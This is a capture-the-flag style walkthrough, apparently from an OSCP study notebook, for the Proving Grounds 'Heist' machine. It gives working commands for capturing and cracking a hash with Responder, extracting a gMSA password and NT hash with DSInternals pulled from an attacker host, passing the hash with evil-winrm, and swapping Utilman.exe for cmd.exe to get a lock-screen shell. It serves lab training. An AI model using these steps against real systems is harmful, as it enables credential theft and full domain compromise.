> For the complete documentation index, see [llms.txt](https://aditya-3.gitbook.io/oscp/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://aditya-3.gitbook.io/oscp/readme/walkthroughs/pg-practice/heist-1.md).

# Heist

## 8080

![](/files/GHRpA6nTP3CE1XCv2rTb) Now visiting our ip: while running responder:![](/files/6h9p3zX1zLp1zbZL5w0L) We can crack it: ![](/files/eZK4ztTeVu0qurPKA2oT) Now logging in with evil-winrm:

```
evil-winrm -i 192.168.180.165 -u enox -p 'california'
```

![](/files/qAJpjIulPfPorxwxa4qJ)

Found a todo list: ![](/files/fykar0nZEYxuxnyt7ZjS) Could do something with gMSA

## gMSA

Now to find gMSA:

```
Get-ADServiceAccount -Filter * -Properties * | Select SamAccountName,PrincipalsAllowedToRetrieveManagedPassword,msDS-ManagedPasswordInterval,ServicePrincipalNames
```

![](/files/6jZoUwVbHZ8iRwe1L78s) Web Admins are allowed to retrieve the password: ![](/files/3Fy5f7Yh6I4SmiCfPCcV) We belong to Web Admins.

To get password blob:

```
Get-ADServiceAccount  -Identity svc_apache -Properties 'msDS-ManagedPassword'
```

Now using DSInternals

```
wget http://192.168.45.167/DSInternals.zip -o DSInternals.zip
Unblock-File DSInternals.zip
Expand-Archive DSInternals.zip
cd DSInternals
cd DSInternals
import-module .\DSInternals.psd1
```

Now store the password as PSCredential object:

```
$cred = new-object system.management.automation.PSCredential "heist.offsec\svc_apache",(ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword
```

Now login as svc\_apache using PSSession:

```
Enter-PSSession -ComputerName DC01 -Credential $cred
```

![](/files/YVy4yGaUUnjGZZkr1UIe)

We can also get NTLM Hashes with:

```
$gmsa = Get-ADServiceAccount -Identity "svc_apache" -Properties "msDS-ManagedPassword"
$mp = $gmsa.'msDS-ManagedPassword'
(ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword | ConvertTo-NTHash

```

## SeRestorePrivilege

Now logging in with winrm with the hash:

```bash
evil-winrm -i 192.168.180.165 -u 'svc_apache$' -H '023145fc00ce8bab62704eb63ab7bdab'
```

![](/files/lVYfwpjqOjygIGgtZXyN) We have SeRestorPrivilege ![](/files/FnGxUnKw4h006Qshtyoo)

Now using this page: <https://github.com/gtworek/Priv2Admin> ![](/files/2DQPSIIBiCK1eEXSodEy)

```
ren "C:/Windows/System32/Utilman.exe"  Utilman.old
```

```
ren "C:/Windows/SYstem32/cmd.exe" Utilman.exe
```

Now we can get to the lockscreen with rdesktop:

```
rdesktop 192.168.180.254
```

![](/files/8qVGShfKN5nxwd4mCfzM) Now press `win + U` ![](/files/xDYxesLmdsb4FZQiCWHT) We can transfer rcat and execute to get a proper shell: ![](/files/xsm3ckFXNQjPjkqqQLwb)
